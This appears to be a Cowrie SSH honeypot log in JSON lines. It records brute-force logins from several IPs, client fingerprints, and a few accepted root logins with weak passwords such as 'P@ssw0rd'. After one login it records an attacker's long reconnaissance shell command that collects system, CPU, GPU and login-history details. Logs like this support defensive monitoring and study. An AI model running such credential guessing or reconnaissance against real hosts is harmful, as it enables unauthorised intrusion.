{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:16:25.002935Z","src_ip":"212.227.235.229","session":"054e691fa633"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-26T21:16:25.412137Z","src_ip":"212.227.235.229","session":"fa4205631b6b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:16:25.890995Z","src_ip":"212.227.235.229","session":"054e691fa633"}
{"eventid":"cowrie.login.failed","username":"user","password":"admin","message":"login attempt [user/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:16:26.738160Z","src_ip":"212.227.235.229","session":"054e691fa633"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:16:26.868307Z","src_ip":"212.227.235.229","session":"fa4205631b6b"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":45818,"dst_ip":"1.2.3.4","dst_port":22,"session":"19a1f9784d1b","protocol":"ssh","message":"New connection: 45.88.8.186:45818 (1.2.3.4:22) [session: 19a1f9784d1b]","sensor":"my-vps","timestamp":"2025-08-26T21:16:27.940452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:16:28.320265Z","src_ip":"45.88.8.186","session":"19a1f9784d1b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:16:28.321012Z","src_ip":"45.88.8.186","session":"19a1f9784d1b"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:16:29.787992Z","src_ip":"212.227.235.229","session":"054e691fa633"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd01","message":"login attempt [root/P@ssw0rd01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:16:30.220006Z","src_ip":"45.88.8.186","session":"19a1f9784d1b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:16:30.816096Z","src_ip":"45.88.8.186","session":"19a1f9784d1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55678,"dst_ip":"1.2.3.4","dst_port":22,"session":"c21a34ed9b97","protocol":"ssh","message":"New connection: 212.227.235.229:55678 (1.2.3.4:22) [session: c21a34ed9b97]","sensor":"my-vps","timestamp":"2025-08-26T21:16:37.179466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:16:37.242794Z","src_ip":"212.227.235.229","session":"c21a34ed9b97"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:16:37.471738Z","src_ip":"212.227.235.229","session":"c21a34ed9b97"}
{"eventid":"cowrie.login.failed","username":"mms","password":"mms","message":"login attempt [mms/mms] failed","sensor":"my-vps","timestamp":"2025-08-26T21:16:39.482716Z","src_ip":"212.227.235.229","session":"c21a34ed9b97"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:16:43.125039Z","src_ip":"212.227.235.229","session":"c21a34ed9b97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","size":524,"shasum":"1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:17:17.308918Z","src_ip":"176.65.149.186","session":"861b4dd727dc"}
{"eventid":"cowrie.session.closed","duration":180.17613530158997,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:17:17.313651Z","src_ip":"176.65.149.186","session":"861b4dd727dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55700,"dst_ip":"1.2.3.4","dst_port":22,"session":"008662702ccd","protocol":"ssh","message":"New connection: 212.227.235.229:55700 (1.2.3.4:22) [session: 008662702ccd]","sensor":"my-vps","timestamp":"2025-08-26T21:17:24.071779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:17:24.108418Z","src_ip":"212.227.235.229","session":"008662702ccd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:17:24.315089Z","src_ip":"212.227.235.229","session":"008662702ccd"}
{"eventid":"cowrie.login.failed","username":"db2inst2","password":"db2inst2","message":"login attempt [db2inst2/db2inst2] failed","sensor":"my-vps","timestamp":"2025-08-26T21:17:25.847449Z","src_ip":"212.227.235.229","session":"008662702ccd"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:17:27.544097Z","src_ip":"212.227.235.229","session":"008662702ccd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59694,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0837961d479","protocol":"ssh","message":"New connection: 212.227.235.229:59694 (1.2.3.4:22) [session: d0837961d479]","sensor":"my-vps","timestamp":"2025-08-26T21:17:28.175831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:17:28.820112Z","src_ip":"212.227.235.229","session":"d0837961d479"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:17:28.820937Z","src_ip":"212.227.235.229","session":"d0837961d479"}
{"eventid":"cowrie.login.success","username":"root","password":"Nuha@123","message":"login attempt [root/Nuha@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:17:31.442023Z","src_ip":"212.227.235.229","session":"d0837961d479"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:17:32.838745Z","src_ip":"212.227.235.229","session":"d0837961d479"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42430,"dst_ip":"1.2.3.4","dst_port":22,"session":"417f4908fa1b","protocol":"ssh","message":"New connection: 212.227.235.229:42430 (1.2.3.4:22) [session: 417f4908fa1b]","sensor":"my-vps","timestamp":"2025-08-26T21:17:53.407983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:17:54.410372Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:17:54.411479Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:17:58.795280Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:18:01.360664Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.361508Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.362442Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.364166Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.365395Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.366189Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
